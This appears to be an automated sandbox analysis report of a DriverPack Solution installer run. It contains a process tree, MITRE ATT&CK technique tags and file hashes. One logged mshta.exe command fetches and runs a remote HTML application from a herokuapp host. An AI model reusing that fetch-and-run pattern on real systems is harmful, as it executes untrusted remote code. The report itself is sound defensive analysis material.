    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_13610.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_13610.txt""
        5⤵
        Loads dropped DLL
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1544
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_13610.log"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2380
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_44518.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_44518.txt""
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:984
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_44518.log"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2408
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_37843.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_37843.txt""
        5⤵
        Loads dropped DLL
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:844
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_37843.log"
        6⤵
        Executes dropped EXE
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1640
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_39981.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_39981.txt""
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2992
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_39981.log"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2892
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_43386.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_43386.txt""
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1756
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_43386.log"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:284
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_25751.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_25751.txt""
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1728
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_25751.log"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1652
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_2898.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_2898.txt""
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2136
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_2898.log"
        6⤵
        Executes dropped EXE
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:964
- C:\Windows\SysWOW64\mshta.exe
  C:\Windows\system32\mshta.exe "http://dwrapper-prod.herokuapp.com/bin/watcher.html"
  2⤵
  - Blocklisted process makes network request
  - Modifies Internet Explorer settings
  PID:628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

T1197

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

BITS Jobs

T1197

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\39GEHZPO\CONTINUOUS-1[1].mp3

Filesize
9KB

MD5
efa6f5d70c558614f18c17d54c155fe9

SHA1
5fcd5fe13f7e8dcb80c8f3f3febf6cdd00c67c9e

SHA256
571aed8d5306ecfa709dc894f6fe66176bc99380ee42694328b3da237fd6b989

SHA512
0e89ef7cb550ed7340b7e7fb612273938c5b0ce61edb8f4aca1782982067fbb51d099ae2fdf27782173ba0182f487c9fc6b11fe67b109f0c510ef8f2dc8f35cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\39GEHZPO\CONTINUOUS-2[1].mp3

Filesize
26KB

MD5
9dc08ae4415c783e8e6f7658423def22

SHA1
88a708d3e775dc03f72077217561c4ac12d4f801

SHA256
a3857040e7a5e315d3fbab41ddb232465fc2b57db4aaedef2f3b74c699f01a8a

SHA512
e83e84d6abff2571b97fce5883e37da3aec99c1bff7064a7ba8857da6c13ceed9ddbef26ab37e36f88b85c81e3979cd76f454aa3a22a41e52ec715c6546366cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HHT5LGG0\client_ip[1].js

Filesize
31B

MD5
4a8fb8ec7219d37e4378482e64dae43a

SHA1
ce90958c15e557707ff95a810e6d8e8d4bd519ad

SHA256
4e3fa8dc4d7d15427884727b3d3f6ed76dddbfed8120671e40a88191740c926e

SHA512
9aec0dc1d54c18696555f042def15a832c9c3fa80f37dc36bf47c022e655ef5f2ab97db0722b3e337936fe48e3f6c9fc0120d51137f0a6c9c27777e8f70edcb7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LPQ313RR\EXPERT-DRIVERS-1[1].mp3

Filesize
25KB

MD5
540072f31fd5aa996268425beac11da8

SHA1
2aee0efdd9ed72e969a1bfa8bc4c84656f972f80

SHA256
1f19a45b24a98014ab4821a1c80b1d2120f54e24cf2517b73f015141d6aa98ed

SHA512
477fa6616ce8a55f5e6e7d0e28eba3e821189a08edc11a238b1066a4ae0f4930c85c5684e2570110f30cd04f4db5ecc230c1088a511f46ac5b8fa2168e72ceb1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\1[1].js

Filesize
1KB

MD5
b2aeef062db55284085a863b0fcf48a5

SHA1
8c59ead571761caae34b0c2776e3ea32d19aaf48

SHA256
c79c9f0f44ca9ef9e84346bb88c12187c3f0dde18f6c8fa83a54d1d89cbb0cb7

SHA512
751113322b59eb6b1be63c0bef65335053fe205f3836cc4ff7800a4d368dd240015f327cf1a6274faab1b49659d219a1de59b633ae67dacc8cfed62bc57f3add

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\2[1].js

Filesize
4KB

MD5
22d3d08cbec1245327396faa5b60725a

SHA1
71dfb22d57f73cd5390f1991b6013ab44cd7351a

SHA256
923cbff9e47ca64e292a8932a13ed11f9e4a488dc20775181b010231f15e3e26

SHA512
d90b4c383077038d436b9e125240b62cfd928d24940e464a93fc88a0c76f1f1ee79e617ccce0f41fbf1df3d660c3764e323f02674e2f45bba0cd31b957e09d92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\3[1].js

Filesize
2KB

MD5
cc9e168614a8d567352e24f970ca21e0

SHA1
623c06bb9699f5ad91c4d19199a0f3780fc76a4d

SHA256
578820b83cd0244ffc068665c531a8c7d633f890a927a682a1708b84b7a08702

SHA512
a98dacde394030a590e9d31941f71b8fba3544edca2f17188fa940b314e58a8139fd62cf664a3d49264c8812053f5e869ecb6700a2b2a7bdcabd3c731c224d2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\4[1].js

Filesize
1KB

MD5
b21247b2428e6d9f72405eb1a2f5f75c

SHA1
11c6612989710432ae9730c2c20ce7ee9f0df609

SHA256
9ddf298484bd63f71cff04dd81e00913266fa8d71793e2c26f3b7b215067812c

SHA512
d3060f786d378680da1917f7e00878a2012c6b9c497693b0c01becf5d896f2681e851fb4f6724710a6e9c755d988a0828df55b0966b431a38756355b9acd0ebb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\5[1].js

Filesize
557B

MD5
50b3202acf32b140238d284fd2f9ce17

SHA1
72f7db2cb9b6d09ac1f853a365d329d83f5b6c9c

SHA256
f173f32e6ce3b40e56cc2b41ea8f6b15555f2b38d069a39f561c40ebc4f51eda

SHA512
bc83deabb31cce7e1bfa7269360fb4adfda9fb7117be455810c6b6f6ba3a0ae9875b3063b9a6cba5b034b294252c9b24830db31d0f2092cd0b0b2ae058f9ca86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\ANTIVIRUS-1[1].mp3

Filesize
36KB

MD5
7557d8cd4046327c15d600a1d2c94179

SHA1
c5cdb72ff869186fd49bf444b72186d6c64a230c

SHA256
46d1565a9237f7ade1d03a2d70c084f5f688d6a0574220ecc5eb83d5cfd875ed

SHA512
a56981e7b3c9757ff6e11373b5a75e66d70d1f3f5d3539cc647bb229784ba5dc52199eaa4f3f01d9d3fe3ab9730a90fb5e724e3fdfe54bed12e512f76d67a194

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\ANTIVIRUS-2[1].mp3

Filesize
23KB

MD5
b9d3ff97b96457be067dfc0b4bf06cf8

SHA1
ef1d8323a077aec206027af7616843708e898e9f

SHA256
c87feb5bd45ff4ffb897f53c22e3e2f5732ad49d124724248a06627162bc40ab

SHA512
c0e09060fb1c32d296abd0baebf741b5410ed3923da3b942f6e9d2510323cc223597fd0f7d4c7eb78116df0036d5f9d19115305db104eaa8671e3809672a80b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\collect[2].gif

Filesize
35B

MD5
28d6814f309ea289f847c69cf91194c6

SHA1
0f4e929dd5bb2564f7ab9c76338e04e292a42ace

SHA256
8337212354871836e6763a41e615916c89bac5b3f1f0adf60ba43c7c806e1015

SHA512
1d68b92e8d822fe82dc7563edd7b37f3418a02a89f1a9f0454cca664c2fc2565235e0d85540ff9be0b20175be3f5b7b4eae1175067465d5cca13486aab4c582c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\lang[1].js

Filesize
87KB

MD5
3b196a2a5e0875a186efa1a6101b775d

SHA1
9a2e605751e1f9c0c2fa0b2ee119ba4886f27b8e

SHA256
b6ef0302fb7fe71577d6b6afe104b4c890fc6419fb9a9c4ec359a0cc25ea8885

SHA512
3c8136e89d08bf91852834b54ffb2b5334fcdbedd974f134a38238a0b7b3d138504c74abe4486936846788253d9050c750c9f8f8c082d749e03f092df80f3e0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\matomo[1].htm

Filesize
92B

MD5
51c8e2ec2d4a042736b88f1be1be5b7e

SHA1
1d0129c54851c24ef993fded1645041f9dbdeeb0

SHA256
481beea6f83c5c784276df3bfb8693cc60c0ce8ef0a2cb8f47d624e2d6c9b076

SHA512
e65f716422e1617e2840d0f16b04672f0f64296e57086a8eca3fc778853d4b7dab8173698fea5bbc2617411ca1a8e50759a7d479614833bdf900de0b619e32df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\missing-scripts-detector[1].js

Filesize
1KB

MD5
5bb70933199563bd95a85e9d58d0920b

SHA1
1e0322dd237c61a911d58d11f3a2879d78a36444

SHA256
915a03ddd5d887ce43185a21fd9927ffcfc6e8f373d80d6fb0bfe96e65c029cd

SHA512
7f727d6f0abb14746b24d10e7d2a532b20ba44b0e177c4b1d778bdf8ea3ac4d8b4d644ebec169daa4777dffd22b376d1dafb0ef790815558a665922598da24eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\script[1].js

Filesize
7KB

MD5
5e3199e1e9ab11ef8db27bdc821eccdc

SHA1
d11fda451561c08fdd68d6d8731c8c17f60dc800

SHA256
ddf24f928593cf87e0db0744f8456761089140766a23768d9106bb73efbd0515

SHA512
cd2223f7992aed63955845e5115cf217cc7f1c4418c4e58ddd42843419d023127bc4017728b245a34b4d5ee6b8efdabbe416b987996153458328bbbf4d627718

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\statistics[1].js

Filesize
7KB

MD5
0701e8ce6920da0050b219769314e144

SHA1
8063c0d6ca04e74351209e957d2c8fa95e1a44a4

SHA256
5d53ecd246441e19cd7b305749c822132476170938e5b7a673856b1fd29708bf

SHA512
d748682d921976e19790c720603647fe2a325627af5cae7565f7be8dfa894e5d9f22198170d5b237773172b09684b4bdacf06d0ed0a07734bc61205d4bd73a01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\style[1].css

Filesize
4KB

MD5
ce40483e494b033aa4a204080abb54da

SHA1
de2f905749b10491d2d0db6a79210425e94bf5ac

SHA256
1fc4501622bafc4560c28442d01f708579f26afbb88229328b2ce7e83a2d36a8

SHA512
2ecc3bb2951435126ca161cb7a9dafa1cf08cb8f88cd1becb7bbba02f025485c4f68de517e19a9774bb0edbe075e7ed047df0ab13bc525aa61f8405f41809a81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\sync_cookie_image_check[1].gif

Filesize
43B

MD5
df3e567d6f16d040326c7a0ea29a4f41

SHA1
ea7df583983133b62712b5e73bffbcd45cc53736

SHA256
548f2d6f4d0d820c6c5ffbeffcbd7f0e73193e2932eefe542accc84762deec87

SHA512
b2ca25a3311dc42942e046eb1a27038b71d689925b7d6b3ebb4d7cd2c7b9a0c7de3d10175790ac060dc3f8acf3c1708c336626be06879097f4d0ecaa7f567041

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\7za.exe

Filesize
796KB

MD5
90aac6489f6b226bf7dc1adabfdb1259

SHA1
c90c47b717b776922cdd09758d2b4212d9ae4911

SHA256
ba7f3627715614d113c1e1cd7dd9d47e3402a1e8a7404043e08bc14939364549

SHA512
befaa9b27dc11e226b00a651aa91cbfe1ec36127084d87d44b6cd8a5076e0a092a162059295d3fcd17abb6ea9adb3b703f3652ae558c2eef4e8932131397c12d

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\DriverPackSolution.html

Filesize
4KB

MD5
203ac1542d8e93edbbc80f7b59db5c44

SHA1
ba66db0e746bc550ea860f4023c3cb5c72140ba5

SHA256
8892e63141854bcf4bb1452abef68dd2c348c59322d697ef11a7ab7c5e3c4aea

SHA512
53cb5ad72c66e62d9285c318b606a9819053de729fa18ea72e80a7f09b333cc7868b455048660397086fa80a13ca745e42a6dc22df63d059076befca178a8a95

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\CONTINUOUS-3.mp3

Filesize
26KB

MD5
940828d405c4c92f0bdf931169b6bf14

SHA1
65915dd5622e2ada803525fb3dd259d36546d43f

SHA256
88d420fb6a0a847c522066698efec070203c436aa5e2ff2097bb2e5e3692150b

SHA512
ac18701cb3d4d1e51bd88b35a3be09ee8fd7058e1b4679b5ca8c7e0688f1e27ab834bc955939fd94a2487327f251647c9f46285bfcabb07b2b1bf40e713ad5a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\EXPERT-DRIVERS-3.mp3

Filesize
36KB

MD5
4314c886eb7bce481ec3209b96fad7f8

SHA1
e365140263b4903945d6b20926b3b1c66c8d6998

SHA256
540abfdf5e2894d09dded9dfffe2d1be207b484f32f8e0aa237aba52142eeb8a

SHA512
9f83709548764477e812157b86fbd0d958b189861b59e8b2f308f734be04f15f8b82938c178b4eda5ee23c12176791f3792ced856ab3f2fd4391513ee37eb706

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\START-INITIAL-1.mp3

Filesize
20KB

MD5
95c290a75e2d3d44f0d76142508edcf6

SHA1
a090827bd93cbe812e32d81272f7cfe9a9b31b4a

SHA256
7ce172ba3df0c381dabc6688dc584035860052b57242ec01ee3adc60ccb3bbc3

SHA512
f2bc1232896eefd0b7e27158067bffaa4bacd602a2fd948896ee6123dbb0ad504084f3ced7a9efa3e7c444a1301126f95ae6466fa7004d9c30661dc62b5c9bd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\START-LOADED-1.mp3

Filesize
38KB

MD5
00d14954338cfc5a011e75afe7237355

SHA1
5534fcaafd1e9edae19a514c415b48a929842fcf

SHA256
3a2f113b271e4a4a6bc8be28f4396babf7e92331492074c29dbaa83d0c09ad57

SHA512
0c1af04bbf833018d2e39a2d888ef16c9686eb0bf1561030b06e9b257678a5e02328d42d5cc66fa3ebfe8ce8705568012653a0cd236c466ab84ad42a2ede50c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\START-SETUP-1.mp3

Filesize
24KB

MD5
5dfd5ac5c08a629db586c6b737905ffd

SHA1
7d7418ec5c0099ce47476cfc63d160ae2f25d16d

SHA256
f01ce28bdb7af9b93ed9e255d5f2c4b7860c97d2f0d58339dbd489828b3484ba

SHA512
90e301b3cc64ba21517823767f5ac44dfd72fcc64eb40b5156c1186c466f2bf1a3e2035f316ee55709051fa47a1fd344e5fddfc88586a55396481e59adedd26d

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\TEAM-PROOF-2.mp3

Filesize
60KB

MD5
50981b671fbad5e721b83245563dcb66

SHA1
42db8a6291d1f3b33a58a505b446c08e13f7d3c3

SHA256
09bd89dd7b59b6403c9fc495d8e4780840f9ade3ae9744f684e90876b250f981

SHA512
9c7cddbfce10dca0c5359860fe5791be90d3e8a27f77c8c500d9cc8ab180ad691c4a3c9a8044df7577efbb9716150b7cdc23800e54264e2a92af0b4f34b8f1a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en\intro.mp3

Filesize
27KB

MD5
691c1edc79b032ea6d150fc291b7613d

SHA1
56049f75783bbed2aae6d03eb91b752bb16548c3

SHA256
8fcbf2cede0ba798aabc145593b273d3c76596ca9bce0a3138684fa7b416359f

SHA512
df1623c1542bbfe3ca2e6505d46538e6ec0eebbde8d712e03d32e8c22aa2a5e62b8369a3ae9263139f0e523826c15749c188b2005212ce6eb2e033054fdcaaa4

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\ru\STORIES-adout-8.mp3

Filesize
17KB

MD5
9bfcf4abe7aa3603fdf1e37bbd9908ed

SHA1
7fc9cbe58273939ea9dd04463ca2ccfaf913658d

SHA256
c2f79a0267df7d522b13e49b406f74892cc6744b88204449387a335cf525550d

SHA512
61fc30694f6a12d03fc95fa537d771ee7d6467c8c457eada43062c036e5347637f0461890e8fbae5f476eee1ea74b152adfc7b1617118ede74c43cf36edbd633

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\config.js

Filesize
3KB

MD5
31009d2efb710925bf7f308af59c629b

SHA1
5215c77b1719d0974dc529b523b758ef85dbebd4

SHA256
18f86ef3fad86c97d56274e5577b178a77f40587a80451a971013248e37190a6

SHA512
44129d626970c101df41a0bc94ff6120a1034077628da968d9c772fa6125d1f11478480cec7086dfd1625c8fc07820202a711a5598ea131b7742b31211a3f394

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\css\custom-control.css

Filesize
10KB

MD5
f7f8703ada2176dc144343a2c2acb1cd

SHA1
091334a48056a8baafff0cd672232de1c1f6c838

SHA256
7d7853e95258a7a3f8eaf41795f7124e7d2dacdeb5f1efe212b3ff7ed0da9e50

SHA512
27d46472c06103e0bdd9d40149804c16f469305752c3a6d8473c2f2ab22b2c8fa5d65d61dda7c617a3f12d8526b56a10320b8683f31d210ac2185fd0daed8e97

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\css\fonts\DRPicons\DRPicons-webfont.eot

Filesize
7KB

MD5
d85a00ccb58d531afd9ad80a067fbf0e

SHA1
0a3c0cfea5b9c0fdd5f17a1df49cb1512316330d

SHA256
0a04d85875091cc334f63b90c8ccfa0838f20023945d949296363369066870e3

SHA512
bce1796d0c71291cb779e2e99399a213b030663d5968330932b4a059ba48f3679e2df9e9c84201efb090a44b499bc5f46d174ad40b4b1d3afb5df5d2f3299261

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\css\fonts\Open-Sans\opensans-regular-webfont.eot

Filesize
40KB

MD5
88a9c629f26f8563a72eac95cb0744bc

SHA1
484bca13532678133dc14a668c580be2c1346526

SHA256
3ae576bfa96d7cf6614c8c97290c7abe03191a8ceb0c837a21e7ffe70d66ca62

SHA512
b4cdaa3a5a46ef368e9138c9874aa1173b466bc660d5bbbd13fc3f10f509cda9af151a2667ecd079935d60992b1436f6d5843ced5a063769e19e67f84c402af9

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\css\fonts\ProximaNova\ProximaNova-Bold.eot

Filesize
141KB

MD5
be0e58130a84b19c8523345478a0bd3f

SHA1
35dfea056f715d8191f2647e56c214afaf819eec

SHA256
1c3a470bf710204b1dbd65679b914af4b94e7f018b1f7df3d61ff863d6f335d9

SHA512
c0ca4a33842d69fad8f1795864c9b592d2cedd62b14efeb46676823460ea50693ccc884891d16f4ba1ffdd5e0a80f9d06fd6e65fe184f3ea283ff441e7b874c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\css\fonts\ProximaNova\ProximaNova-Bold.woff

Filesize
57KB

MD5
a3932b53cb250b684b63d1e04af5603e

SHA1
b06c657df6b320b915a17455848e66695a9fc68e

SHA256
2a8f208d9d8556ff58da8a420316de6d634a568a0eeb94c043430659fff7d338

SHA512
e8e68301dde147b7c79e21689066b7c9653a82f9898c2c76f4060af1a48c7f997f4797de5002e870e9ffba05efcb47f10cae5b8beadbe7909a85de4c04c54730

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\css\fonts\ProximaNova\proxima_nova_light-webfont.eot

Filesize
61KB

MD5
ee9163c34f600221169f8ff531e97182

SHA1
57f0b2c837c94f2a0df47ee62b4639fd6426bfa0

SHA256
53f30a622db68cebe92dbd384cc292aef13ad7e3349a10a77c29326e10634c21

SHA512
d51e2a5f6df706eaa2c5ffa071a9a9c08e58a30b4af64a1ccbe81f8e9c38f20429df665cabaf295129490afc639b7e19c0fced428610a284a17899c3290904cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\css\fonts\ProximaNova\proxima_nova_semibold-webfont.eot

Filesize
65KB

MD5
044aa0b596161750cb58aca15c52cf38

SHA1
d40e645b34188a54d909fa40f7eddeefb8b9df03

SHA256
790579e11608136663d073bc6f99848c04b4dcd69216df7daf5be00df573a3fd

SHA512
1a3b3abc614a7ddf673e34a936de63809f8c18a86409364b2bbdeb608fbcd845095ba7cfb34a0826e2ac18cfc5ccd4d47d4bfa13fae3caba7fbc4470d36c8086

Download Submit
C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\css\icons-checkbox.css

Filesize
444B

MD5
3be98220035017d9b818f3cc94f87587

SHA1
bc07f11d0a59f942ac942dba02214a7041ad6e3a

SHA256
